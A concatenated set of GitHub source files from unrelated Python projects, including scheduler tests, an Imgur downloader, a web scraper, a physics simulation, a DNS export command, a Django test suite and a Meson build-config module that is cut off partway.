job_sched.disable()\n\n self.reconfigure()\n assert job_sched is self.mcp.jobs.get_by_name(\"MASTER.test_unchanged\")\n assert job_sched.job is orig_job\n assert not job_sched.job.enabled\n\n @suite(\"integration\")\n def test_job_removed(self):\n assert \"MASTER.test_remove\" in self.mcp.jobs\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_remove\")\n run0 = next(self._get_runs_to_schedule(job_sched))\n run0.start()\n run1 = next(self._get_runs_to_schedule(job_sched))\n\n assert_equal(job_sched.job.name, \"MASTER.test_remove\")\n action_map = job_sched.job.action_graph.action_map\n assert_equal(len(action_map), 2)\n assert_equal(action_map[\"action_remove\"].name, \"action_remove\")\n\n self.reconfigure()\n assert \"test_remove\" not in self.mcp.jobs\n assert not job_sched.job.enabled\n assert not run1.is_scheduled\n\n @suite(\"integration\")\n def test_job_changed(self):\n assert \"MASTER.test_change\" in self.mcp.jobs\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_change\")\n run0 = next(self._get_runs_to_schedule(job_sched))\n run0.start()\n next(self._get_runs_to_schedule(job_sched))\n assert_equal(len(job_sched.job.runs.runs), 2)\n\n assert_equal(job_sched.job.name, \"MASTER.test_change\")\n action_map = job_sched.job.action_graph.action_map\n assert_equal(len(action_map), 2)\n\n self.reconfigure()\n new_job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_change\")\n assert new_job_sched is job_sched\n assert new_job_sched.job is job_sched.job\n\n assert_equal(new_job_sched.job.name, \"MASTER.test_change\")\n action_map = job_sched.job.action_graph.action_map\n assert_equal(len(action_map), 1)\n\n assert_equal(len(new_job_sched.job.runs.runs), 2)\n assert new_job_sched.job.runs.runs[1].is_starting\n assert new_job_sched.job.runs.runs[0].is_scheduled\n assert_equal(job_sched.job.context[\"a_variable\"], \"is_constant\")\n assert new_job_sched.job.context.base.job is new_job_sched.job\n\n @suite(\"integration\")\n def test_job_changed_disabled(self):\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_change\")\n job_sched.disable()\n assert not job_sched.job.enabled\n\n self.reconfigure()\n new_job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_change\")\n assert not new_job_sched.job.enabled\n\n @suite(\"integration\")\n def test_job_new(self):\n assert \"test_new\" not in self.mcp.jobs\n self.reconfigure()\n\n assert \"MASTER.test_new\" in self.mcp.jobs\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_new\")\n\n assert_equal(job_sched.job.name, \"MASTER.test_new\")\n action_map = job_sched.job.action_graph.action_map\n assert_equal(len(action_map), 1)\n assert_equal(action_map[\"action_new\"].name, \"action_new\")\n assert_equal(action_map[\"action_new\"].command, \"command_new\")\n assert_equal(len(job_sched.job.runs.runs), 1)\n assert job_sched.job.runs.runs[0].is_scheduled\n\n @suite(\"integration\")\n def test_daily_reschedule(self):\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_daily_change\")\n\n next(self._get_runs_to_schedule(job_sched))\n\n assert_equal(len(job_sched.job.runs.runs), 1)\n run = job_sched.job.runs.runs[0]\n assert run.is_scheduled\n\n action_runs = run.action_runs\n self.reconfigure()\n assert action_runs.is_cancelled\n\n assert_equal(len(job_sched.job.runs.runs), 1)\n new_run = job_sched.job.runs.runs[0]\n assert new_run is not run\n assert new_run.is_scheduled\n assert_equal(run.run_time, new_run.run_time)\n\n @suite(\"integration\")\n def test_action_added(self):\n self.reconfigure()\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_action_added\")\n assert_length(job_sched.job.action_graph.action_map, 2)\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"Yelp/Tron","sub_path":"tests/mcp_reconfigure_test.py","file_name":"mcp_reconfigure_test.py","file_ext":"py","file_size_in_byte":10819,"program_lang":"python","lang":"en","doc_type":"code","stars":340,"dataset":"github-code","pt":"7"}
+{"seq_id":"2879428938","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport json\nimport re\nfrom typing import Optional\n\nfrom praw.models import Submission\n\nfrom bdfr.exceptions import SiteDownloaderError\nfrom bdfr.resource import Resource\nfrom bdfr.site_authenticator import SiteAuthenticator\nfrom bdfr.site_downloaders.base_downloader import BaseDownloader\n\n\nclass Imgur(BaseDownloader):\n def __init__(self, post: Submission):\n super().__init__(post)\n self.raw_data = {}\n\n def find_resources(self, authenticator: Optional[SiteAuthenticator] = None) -> list[Resource]:\n self.raw_data = self._get_data(self.post.url)\n\n out = []\n if \"is_album\" in self.raw_data:\n for image in self.raw_data[\"images\"]:\n if \"mp4\" in image:\n out.append(Resource(self.post, image[\"mp4\"], Resource.retry_download(image[\"mp4\"])))\n else:\n out.append(Resource(self.post, image[\"link\"], Resource.retry_download(image[\"link\"])))\n else:\n if \"mp4\" in self.raw_data:\n out.append(Resource(self.post, self.raw_data[\"mp4\"], Resource.retry_download(self.raw_data[\"mp4\"])))\n else:\n out.append(Resource(self.post, self.raw_data[\"link\"], Resource.retry_download(self.raw_data[\"link\"])))\n return out\n\n @staticmethod\n def _get_data(link: str) -> dict:\n try:\n if link.endswith(\"/\"):\n link = link.removesuffix(\"/\")\n if re.search(r\".*/(.*?)(gallery/|a/)\", link):\n imgur_id = re.match(r\".*/(?:gallery/|a/)(.*?)(?:/.*)?$\", link).group(1)\n link = f\"https://api.imgur.com/3/album/{imgur_id}\"\n else:\n imgur_id = re.match(r\".*/(.*?)(?:_d)?(?:\\..{0,})?$\", link).group(1)\n link = f\"https://api.imgur.com/3/image/{imgur_id}\"\n except AttributeError:\n raise SiteDownloaderError(f\"Could not extract Imgur ID from {link}\")\n\n headers = {\n \"referer\": \"https://imgur.com/\",\n \"origin\": \"https://imgur.com\",\n \"content-type\": \"application/json\",\n \"Authorization\": \"Client-ID 546c25a59c58ad7\",\n }\n res = Imgur.retrieve_url(link, headers=headers)\n\n try:\n image_dict = json.loads(res.text)\n except json.JSONDecodeError as e:\n raise SiteDownloaderError(f\"Could not parse received response as JSON: {e}\")\n\n return image_dict[\"data\"]\n","repo_name":"aliparlakci/bulk-downloader-for-reddit","sub_path":"bdfr/site_downloaders/imgur.py","file_name":"imgur.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":2113,"dataset":"github-code","pt":"7"}
+{"seq_id":"2516714806","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nURL = 'https://au.indeed.com/jobs?q=data+science+internship&l=Sydney+NSW'\npage = requests.get(URL)\n\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n\n# In[2]:\n\n\nresults = soup.find(id='resultsCol')\n\nprint(results.prettify())\n\n\n# In[3]:\n\n\njob_elems = results.find_all('div', class_='jobsearch-SerpJobCard')\nprint(job_elems)\n\n\n# In[4]:\n\n\nfor job_elem in job_elems:\n print(job_elem, end='\\n'*2)\n\n\n# In[5]:\n\n\nfor job_elem in job_elems:\n title_elem = job_elem.find('h2', class_='title')\n company_elem = job_elem.find('div', class_='sjcl')\n location_elem = job_elem.find('div', class_='summary')\n if None in (title_elem, company_elem, location_elem):\n continue\n print(title_elem.text.strip())\n print(company_elem.text.strip())\n print(location_elem.text.strip())\nprint()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"vidyasagarverma/webscrapping","sub_path":"webscrapping from indeed.py","file_name":"webscrapping from indeed.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"18733465886","text":"\nfw=\"aaa\"\nsw=\"cba\"\ntw=\"cdb\"\ntemp1=\"\"\ntemp2=\"\"\ntemp3=\"\"\nf1w=fw.lstrip(\"a\")\ns2w=sw.lstrip(\"a\")\nt2w=tw.lstrip(\"a\")\nl1=list(f1w)\nl2= list(s2w)\nl3= list(t2w)\nfor i in l1:\n temp1+=str(ord(i)-ord(\"a\"))\n\nfor i in l2:\n temp2+=str(ord(i)-ord(\"a\"))\nfor i in l3:\n temp3+=str(ord(i)-ord(\"a\"))\nif(temp1==\"\"):\n temp1=int(0)\nif(temp2==\"\"):\n temp2=int(0)\n\nif(int(temp1)+int(temp2)==int(temp3)):\n print(\"true\")\n\n","repo_name":"sathvikchandu/my-programs-","sub_path":"leetcode/leetcode_weekly_30.05.2021.py","file_name":"leetcode_weekly_30.05.2021.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"70602460703","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.integrate import solve_ivp\n\n# pop_vv_vec=[1,0]\n\n\n# dim=2\nd_matrix = np.zeros((2, 2))\n# print(d_matrix)\n\npvc_before_pulse = 0\npcv_before_pulse = 0\npvv_before_pulse = 1 # Ground state\npcc_before_pulse = 0 # excited state\n\nmatrix_before_pulse = [[pvc_before_pulse, pvv_before_pulse], [pcv_before_pulse, pcc_before_pulse]]\n# print(matrix_before_pulse)\n\n\npvc_after_pulse = [1, 0]\npcv_after_pulse = np.transpose(pvc_after_pulse)\n\npvv_after_pulse = 0\npcc_after_pulse = 1 # excited state\n\n# ------------------ time scale -------------------\nti = 0\ntf = 20E-12 # s\nN = 5000\ntev = np.linspace(ti, tf, N)\n# ---- constants and parameters of the system -----\nhbar = 6.582119569E-16 # eV*s\nihbar = 1j * hbar\nE_lvl_spacing = 1 # eV\ntrans_dipole_mom = 1\ndephase_E = 1E-3 # eV\npop_cc_ = 0\npop_vv_i = 1\n\n# -------- parameters of optical pulse -------------\nAmp = 1\nt0 = 10E-12 # seconds\npulse_width = 1000E-16 # seconds\n# pulse_width=(pulse_width_fs)*(10**-15)\nom = E_lvl_spacing / hbar # Hz\n\n# -------------- initial conditions ----------------\np0 = 0 + 0 * 1j\n\n\n# function computing the EM pulse\ndef e_pulse(t, t0, om, Amp, pulse_width):\n return Amp * np.exp((-(t - t0) ** 2) / ((2 * pulse_width) ** 2)) * np.exp(1j * om * t)\n\n\n# RHS of the equation (version 1)\ndef f(t, p, E_lvl_spacing, ihbar, trans_dipole_mom, dephase_E, t0, om, Amp, pulse_width):\n dp = (1 / ihbar) * ((-1j * dephase_E - E_lvl_spacing) * p) + (1 / ihbar) * trans_dipole_mom * e_pulse(t, t0, om, Amp, pulse_width)\n # print(dp)\n return dp\n\n\n# RHS of the equation (version 2)\ndef f1(t, p, E_lvl_spacing, ihbar, trans_dipole_mom, dephase_E, t0, om, Amp, pulse_width):\n dp = (1 / ihbar) * ((-1j * dephase_E - E_lvl_spacing + om * hbar) * p) +\\\n (1 / ihbar) * trans_dipole_mom * e_pulse(t, t0, om*0, Amp, pulse_width)\n # print(dp)\n return dp\n\n# --------------------- solver ---------------------\nsol = solve_ivp(f, (ti, tf), [p0], t_eval=tev, first_step=tf/N,\n args=(E_lvl_spacing, ihbar, trans_dipole_mom, dephase_E, t0, om, Amp, pulse_width))\n\nt = sol.t\np = sol.y\nnorm = np.max(np.abs(p[0]))\n\nplt.plot(t/1e-12, e_pulse(t, t0, om, Amp, pulse_width))\nplt.plot(t/1e-12, np.real(p[0])/norm)\nplt.plot(t/1e-12, np.imag(p[0])/norm)\nplt.legend(['EM pump pulse', 'Polarization, real part', 'Polarization, imaginary part'])\nplt.xlabel(\"Time (ps)\")\nplt.ylabel(\"Polarization (a.u.)\")\nplt.show()","repo_name":"freude/pySBE","sub_path":"scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"}
+{"seq_id":"39484940808","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\n\n# Ce fichier définit des valeurs utilisées dans plusieurs scripts\n# du projet Baxter de Sara, Eder, Alain\n\nDEPLACEMENT = 0.5; # en CM, incrément de chaque déplacement\nDEPLACEMENT = DEPLACEMENT * 0.01\n\nBAXTER_USED_LIMB = 'right' # or 'left'\n","repo_name":"alainsanguinetti/projet_baxter","sub_path":"scripts/valeurs.py","file_name":"valeurs.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7275225126","text":"import numpy as np\n\ndef calcular_pi(n):\n \"\"\"\n n: la cantidad de terminos a emplear en la sumatoria\n return: la estimacion de pi/8\n \"\"\"\n if(isinstance(n, int)):\n #se inicializan los parametros auxiliares\n #resultado\n pi_octavos = 0\n #parametro auxiliar\n i = 1\n #llamado de la funcion recursiva\n return calcular_pi_aux(n, i, pi_octavos)\n else:\n raise ValueError(\"Tipo de datos incorrecto\")\n \ndef calcular_pi_aux(n, i, pi_octavos):\n \"\"\"\n n: cantidad de terminos en la sumatoria para aproximar pi/8\n i: variable que se incrementa en cada llamado recursivo\n pi_octavos: resultado a retornar\n \"\"\"\n if(n == 0):\n #condicion de parada: se retorna la variable con el resultado acumulado\n return pi_octavos\n else: \n #termino de la sumatoria de leibniz\n pi_octavos += 1 / (i * (i + 2))\n i += 4\n n -= 1\n #se hace el llamado recursivo\n return calcular_pi_aux(n, i, pi_octavos)\n \n \ndef test_1(n): \n pi_estimado = 8 * calcular_pi(n) \n error = np.pi - pi_estimado\n print(\"Estimacion de pi: \", pi_estimado )\n print(\"Error \", error)\n \nn = 1000\ntest_1(n)","repo_name":"BAMDH/Cosas_Uni","sub_path":"Intro programación/Prácticas/Notebooks_jupyter/Recursividad_cola/calcular_pi.py","file_name":"calcular_pi.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"29768954169","text":"#!/usr/bin/env python3\n\nimport csv\nimport os\nimport re\nimport sys\nimport valve\n\nfrom argparse import ArgumentParser\n\n\ndef get_cl_id(cell_names, name):\n name = re.sub(r\"(DC|B|M|NK|T): \", \"\", name)\n if \" & \" in name:\n name = name.split(\" & \")[0]\n return cell_names.get(name, None)\n\n\ndef get_clean_marker(name):\n if name.endswith(\"++\"):\n return name[:-2], \"high\"\n elif name.endswith(\"+-\"):\n return name[:-2], \"low\"\n elif name.endswith(\"+\"):\n return name[:-1], \"positive\"\n elif name.endswith(\"-\"):\n return name[:-1], \"negative\"\n return name, None\n\n\ndef get_pr_id(gate_names, name):\n return gate_names.get(name, None)\n\n\ndef validate(cell_names_file, cell_levels_file, gate_names_file, cell_gate_file):\n \"\"\"\n :param cell_names_file: path to file containing Cell Ontology IDs & Labels\n :param cell_levels_file: path to file containing Cell Ontology IDs & membrane parts\n :param gate_names_file: path to file containing Protein Ontology IDs & Labels\n :param cell_gate_file: path to file to validate\n \"\"\"\n errors = []\n cell_names = {}\n with open(cell_names_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n next(reader)\n for row in reader:\n cell_names[row[1]] = row[0]\n\n gate_names = {}\n with open(gate_names_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n next(reader)\n for row in reader:\n gate_names[row[1]] = row[0]\n\n cell_levels = {}\n with open(cell_levels_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n next(reader)\n for row in reader:\n curie = row[0]\n has_part = row[1]\n lacks_part = row[2]\n high_amount = row[3]\n low_amount = row[4]\n valid_gates = {}\n if has_part:\n for p in has_part.split(\"|\"):\n valid_gates[p] = \"positive\"\n if lacks_part:\n for p in lacks_part.split(\"|\"):\n valid_gates[p] = \"negative\"\n if high_amount:\n for p in high_amount.split(\"|\"):\n valid_gates[p] = \"high\"\n if low_amount:\n for p in low_amount.split(\"|\"):\n valid_gates[p] = \"low\"\n cell_levels[curie] = valid_gates\n\n table = os.path.splitext(os.path.basename(cell_gate_file))[0]\n with open(cell_gate_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n next(reader)\n idx = 1\n for line in reader:\n idx += 1\n cell_pop_name = line[0].strip()\n cell = get_cl_id(cell_names, cell_pop_name)\n if not cell:\n errors.append(\n {\n \"table\": table,\n \"cell\": valve.idx_to_a1(idx, 1),\n \"level\": \"ERROR\",\n \"message\": f\"'{cell_pop_name}' must be a name or synonym from Cell Ontology\",\n }\n )\n continue\n valid_gates = cell_levels.get(cell, {})\n\n # Compare to provided gates\n for marker_name in [x.strip() for x in line[1].split(\",\")]:\n marker_name_clean, level = get_clean_marker(marker_name)\n marker = get_pr_id(gate_names, marker_name_clean)\n if not marker:\n errors.append(\n {\n \"table\": table,\n \"cell\": valve.idx_to_a1(idx, 2),\n \"level\": \"ERROR\",\n \"message\": f\"'{marker_name}' must be a name or synonym from Protein Ontology\",\n }\n )\n continue\n if marker not in valid_gates:\n # TODO - is this OK?\n continue\n expected_level = valid_gates[marker]\n if level == \"positive\" and expected_level in [\"high\", \"low\"]:\n errors.append(\n {\n \"table\": table,\n \"cell\": valve.idx_to_a1(idx, 2),\n \"level\": \"INFO\",\n \"message\": f\"For this cell population, {marker_name_clean} has {expected_level} expression\",\n }\n )\n elif level in [\"high\", \"low\"] and expected_level == \"positive\":\n errors.append(\n {\n \"table\": table,\n \"cell\": valve.idx_to_a1(idx, 2),\n \"level\": \"INFO\",\n \"message\": f\"For this cell population, {marker_name_clean} is positive, but not {level}\",\n }\n )\n elif level != expected_level:\n errors.append(\n {\n \"table\": table,\n \"cell\": valve.idx_to_a1(idx, 2),\n \"level\": \"ERROR\",\n \"message\": f\"For this cell population, {marker_name_clean} must be {expected_level}\",\n }\n )\n return errors\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\"cell_names\", help=\"Cell Ontology IDs & labels/synonyms\")\n parser.add_argument(\"cell_levels\", help=\"Cell Ontology IDs & membrane parts\")\n parser.add_argument(\"gate_names\", help=\"Protein Ontology IDs & labels/synonyms\")\n parser.add_argument(\"input\", help=\"File to validate (cell populations & gates)\")\n args = parser.parse_args()\n errors = validate(args.cell_names, args.cell_levels, args.gate_names, args.input)\n if errors:\n writer = csv.DictWriter(\n sys.stdout,\n delimiter=\"\\t\",\n lineterminator=\"\\n\",\n fieldnames=[\"table\", \"cell\", \"level\", \"message\"],\n )\n writer.writeheader()\n writer.writerows(errors)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jamesaoverton/cell-name-and-marker-validator","sub_path":"src/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"8392495256","text":"#!/usr/bin/python3\n\nfrom datetime import datetime\nfrom models import storage\nimport uuid\n\n\nclass BaseModel:\n def __init__(self, *args, **kwargs) -> None:\n if len(kwargs) != 0:\n date_format = '%Y-%m-%dT%H:%M:%S.%f'\n for key, value in kwargs.items():\n if key == 'created_at' or key == 'updated_at':\n time = datetime.strptime(value, date_format)\n setattr(self, key, time)\n elif key != '__class__':\n setattr(self, key, value)\n else:\n self.id = str(uuid.uuid4())\n self.created_at = datetime.now()\n self.updated_at = datetime.now()\n storage.new(self)\n\n def __str__(self) -> str:\n return (f'[{self.__class__.__name__}] ({self.id}) {self.__dict__}')\n\n def save(self):\n self.updated_at = datetime.now()\n storage.save()\n\n def to_dict(self):\n upd_dict = {\n 'created_at': self.created_at.strftime('%Y-%m-%dT%H:%M:%S.%f'),\n 'updated_at': self.updated_at.strftime('%Y-%m-%dT%H:%M:%S.%f'),\n '__class__': self.__class__.__name__,\n }\n return {**self.__dict__, **upd_dict}\n","repo_name":"dkokonkwo/alu-AirBnB_clone","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"17150177467","text":"import MapReduce\nimport sys\n\n\"\"\"\nMultiply Example in the Simple Python MapReduce Framework\n\"\"\"\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\n\ndef mapper(record):\n if record[0] == 'a':\n for k in range(5):\n key = (record[1], k)\n value = (record[2], record[3])\n mr.emit_intermediate(key, value)\n else:\n for i in range(5):\n key = (i, record[2])\n value = (record[1], record[3])\n mr.emit_intermediate(key, value)\n\n\ndef reducer(key, value):\n count = 0\n for i in range(5):\n prod = []\n for item in value:\n if item[0] == i:\n prod.append(item[1])\n if len(prod) == 2:\n count += prod[0] * prod[1]\n mr.emit((key[0], key[1], count))\n\n\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","repo_name":"bhujyo/Data_science","sub_path":"MapReduce/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"27781167819","text":"from googlecloudsdk.api_lib.dns import export_util\nfrom googlecloudsdk.api_lib.dns import util\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.calliope import exceptions\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\nfrom googlecloudsdk.core.util import files\nfrom googlecloudsdk.third_party.apitools.base import py as apitools_base\n\n\nclass Export(base.Command):\n \"\"\"Export your record-sets into a file.\n\n This command exports the record-sets contained within the specified\n managed-zone into a file.\n \"\"\"\n\n detailed_help = {\n 'DESCRIPTION': '{description}',\n 'EXAMPLES': \"\"\"\\\n To export record-sets into a yaml file, run:\n\n $ {command} YAML_RECORDS_FILE -z MANAGED_ZONE\n\n To import record-sets into a zone file, run:\n\n $ {command} ZONE_FILE --zone-file-format -z MANAGED_ZONE\n \"\"\",\n }\n\n @staticmethod\n def Args(parser):\n parser.add_argument('records_file',\n help='File to which record-sets should be exported.')\n parser.add_argument(\n '--zone-file-format',\n required=False,\n action='store_true',\n help='Indicates that records-file should be in the zone file format.')\n\n @util.HandleHttpError\n def Run(self, args):\n dns = self.context['dns_client']\n messages = self.context['dns_messages']\n resources = self.context['dns_resources']\n project_id = properties.VALUES.core.project.Get(required=True)\n\n # Get the managed-zone.\n zone_ref = resources.Parse(args.zone, collection='dns.managedZones')\n try:\n zone = dns.managedZones.Get(zone_ref.Request())\n except apitools_base.HttpError as error:\n raise exceptions.HttpException(util.GetErrorMessage(error))\n\n # Get all the record-sets.\n record_sets = []\n for record_set in apitools_base.YieldFromList(\n dns.resourceRecordSets,\n messages.DnsResourceRecordSetsListRequest(project=project_id,\n managedZone=zone_ref.Name()),\n field='rrsets'):\n record_sets.append(record_set)\n\n # Export the record-sets.\n try:\n with files.Context(open(args.records_file, 'w')) as export_file:\n if args.zone_file_format:\n export_util.WriteToZoneFile(export_file, record_sets, zone.dnsName)\n else:\n export_util.WriteToYamlFile(export_file, record_sets)\n except Exception as exp:\n msg = 'unable to export record-sets to file [{0}]: {1}'.format(\n args.records_file, exp)\n raise exceptions.ToolException(msg)\n\n log.status.Print('Exported record-sets to [{0}].'.format(args.records_file))\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/surface/dns/record_sets/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"}
+{"seq_id":"38118999305","text":"import json\n\nimport pytest\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom techtest.authors.models import Author\n\npytestmark = pytest.mark.django_db\n\n\ndef test_authors(client):\n # Test create / retrieve\n data = {\n \"first_name\": \"test_author_fn\",\n \"last_name\": \"test_author_ln\"\n }\n res = client.post('/authors/', data=data, content_type=\"application/json\")\n json_data = json.loads(res.content)\n author_id = json_data.get('id')\n assert res.status_code == 201\n assert json_data.get('first_name') == data['first_name']\n assert json_data.get('last_name') == data['last_name']\n assert Author.objects.get(id=json_data.get('id'))\n # Test retrieve\n res = client.get(f'/authors/{author_id}/')\n assert res.status_code == 200\n assert json_data.get('first_name') == data['first_name']\n assert json_data.get('last_name') == data['last_name']\n assert Author.objects.get(id=author_id)\n\n # Test list\n res = client.get('/authors/')\n json_data = json.loads(res.content)\n assert len(json_data) == 1\n assert json_data[0].get('first_name') == data['first_name']\n assert json_data[0].get('last_name') == data['last_name']\n\n # Test update\n updated_data = {\n \"first_name\": \"test_author_fn_update\",\n \"last_name\": \"test_author_ln_update\"\n }\n res = client.put(f'/authors/{author_id}/', data=updated_data, content_type='application/json')\n json_data = json.loads(res.content)\n assert res.status_code == 200\n assert json_data.get('first_name') == updated_data['first_name']\n assert json_data.get('last_name') == updated_data['last_name']\n\n # Test delete\n res = client.delete(f'/authors/{author_id}/')\n assert res.status_code == 200\n # Test if it was removed correctly\n with pytest.raises(ObjectDoesNotExist):\n Author.objects.get(id=author_id)\n\n # Test retrieve object that does not exist\n res = client.get('/authors/2/')\n assert res.status_code == 404\n\n\n\n\n\n\n","repo_name":"belingarb/djangotechtestmain","sub_path":"techtest/authors/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"10377596805","text":"import os, subprocess\nimport typing as T\n\nfrom . import mesonlib\nfrom .mesonlib import EnvironmentException, MachineChoice, PerMachine, split_args\nfrom . import mlog\n\n_T = T.TypeVar('_T')\n\n\n# These classes contains all the data pulled from configuration files (native\n# and cross file currently), and also assists with the reading environment\n# variables.\n#\n# At this time there isn't an ironclad difference between this an other sources\n# of state like `coredata`. But one rough guide is much what is in `coredata` is\n# the *output* of the configuration process: the final decisions after tests.\n# This, on the other hand has *inputs*. The config files are parsed, but\n# otherwise minimally transformed. When more complex fallbacks (environment\n# detection) exist, they are defined elsewhere as functions that construct\n# instances of these classes.\n\n\nknown_cpu_families = (\n 'aarch64',\n 'alpha',\n 'arc',\n 'arm',\n 'avr',\n 'c2000',\n 'dspic',\n 'e2k',\n 'ia64',\n 'm68k',\n 'microblaze',\n 'mips',\n 'mips64',\n 'parisc',\n 'pic24',\n 'ppc',\n 'ppc64',\n 'riscv32',\n 'riscv64',\n 'rl78',\n 'rx',\n 's390',\n 's390x',\n 'sh4',\n 'sparc',\n 'sparc64',\n 'wasm32',\n 'wasm64',\n 'x86',\n 'x86_64',\n)\n\n# It would feel more natural to call this \"64_BIT_CPU_FAMILES\", but\n# python identifiers cannot start with numbers\nCPU_FAMILES_64_BIT = [\n 'aarch64',\n 'alpha',\n 'ia64',\n 'mips64',\n 'ppc64',\n 'riscv64',\n 's390x',\n 'sparc64',\n 'wasm64',\n 'x86_64',\n]\n\ndef get_env_var_pair(for_machine: MachineChoice,\n is_cross: bool,\n var_name: str) -> T.Tuple[T.Optional[str], T.Optional[str]]:\n \"\"\"\n Returns the exact env var and the value.\n \"\"\"\n candidates = PerMachine(\n # The prefixed build version takes priority, but if we are native\n # compiling we fall back on the unprefixed host version. This\n # allows native builds to never need to worry about the 'BUILD_*'\n # ones.\n ([var_name + '_FOR_BUILD'] if is_cross else [var_name]),\n # Always just the unprefixed host verions\n [var_name]\n )[for_machine]\n for var in candidates:\n value = os.environ.get(var)\n if value is not None:\n break\n else:\n formatted = ', '.join(['{!r}'.format(var) for var in candidates])\n mlog.debug('None of {} are defined in the environment, not changing global flags.'.format(formatted))\n return None\n mlog.log('Using {!r} from environment with value: {!r}'.format(var, value))\n return var, value\n\ndef get_env_var(for_machine: MachineChoice,\n is_cross: bool,\n var_name: str) -> T.Tuple[T.Optional[str], T.Optional[str]]:\n ret = get_env_var_pair(for_machine, is_cross, var_name)\n if ret is None:\n return None\n else:\n var, value = ret\n return value\n\nclass Properties:\n def __init__(\n self,\n properties: T.Optional[T.Dict[str, T.Union[str, T.List[str]]]] = None,\n ):\n self.properties = properties or {} # type: T.Dict[str, T.Union[str, T.List[str]]]\n\n def has_stdlib(self, language: str) -> bool:\n return language + '_stdlib' in self.properties\n\n # Some of get_stdlib, get_root, get_sys_root are wider than is actually\n # true, but without heterogenious dict annotations it's not practical to\n # narrow them\n def get_stdlib(self, language: str) -> T.Union[str, T.List[str]]:\n return self.properties[language + '_stdlib']\n\n def get_root(self) -> T.Optional[T.Union[str, T.List[str]]]:\n return self.properties.get('root', None)\n\n def get_sys_root(self) -> T.Optional[T.Union[str, T.List[str]]]:\n return self.properties.get('sys_root', None)\n\n def get_pkg_config_libdir(self) -> T.Optional[T.List[str]]:\n p = self.properties.get('pkg_config_libdir', None)\n if p is None:\n return p\n return mesonlib.listify(p)\n\n def __eq__(self, other: T.Any) -> 'T.Union[bool, NotImplemented]':\n if isinstance(other, type(self)):\n return self.properties == other.properties\n return NotImplemented\n\n # TODO consider removing so Properties is less freeform\n def __getitem__(self, key: str) -> T.Any:\n return self.properties[key]\n\n # TODO consider removing so Properties is less freeform\n def __contains__(self, item: T.Any) -> bool:\n return item in self.properties\n\n # TODO consider removing, for same reasons as above\n def get(self, key: str, default: T.Any = None) -> T.Any:\n return self.properties.get(key, default)\n\nclass MachineInfo:\n def __init__(self, system: str, cpu_family: str, cpu: str, endian: str):\n self.system = system\n self.cpu_family = cpu_family\n self.cpu = cpu\n self.endian = endian\n self.is_64_bit = cpu_family in CPU_FAMILES_64_BIT # type: bool\n\n def __eq__(self, other: T.Any) -> 'T.Union[bool, NotImplemented]':\n if self.__class__ is not other.__class__:\n return NotImplemented\n return \\\n self.system == other.system and \\\n self.cpu_family == other.cpu_family and \\\n self.cpu == other.cpu and \\\n self.endian == other.endian\n\n def __ne__(self, other: T.Any) -> 'T.Union[bool, NotImplemented]':\n if self.__class__ is not other.__class__:\n return NotImplemented\n return not self.__eq__(other)\n\n def __repr__(self) -> str:\n return ''.format(self.system, self.cpu_family, self.cpu)\n\n @classmethod\n def from_literal(cls, literal: T.Dict[str, str]) -> 'MachineInfo':\n minimum_literal = 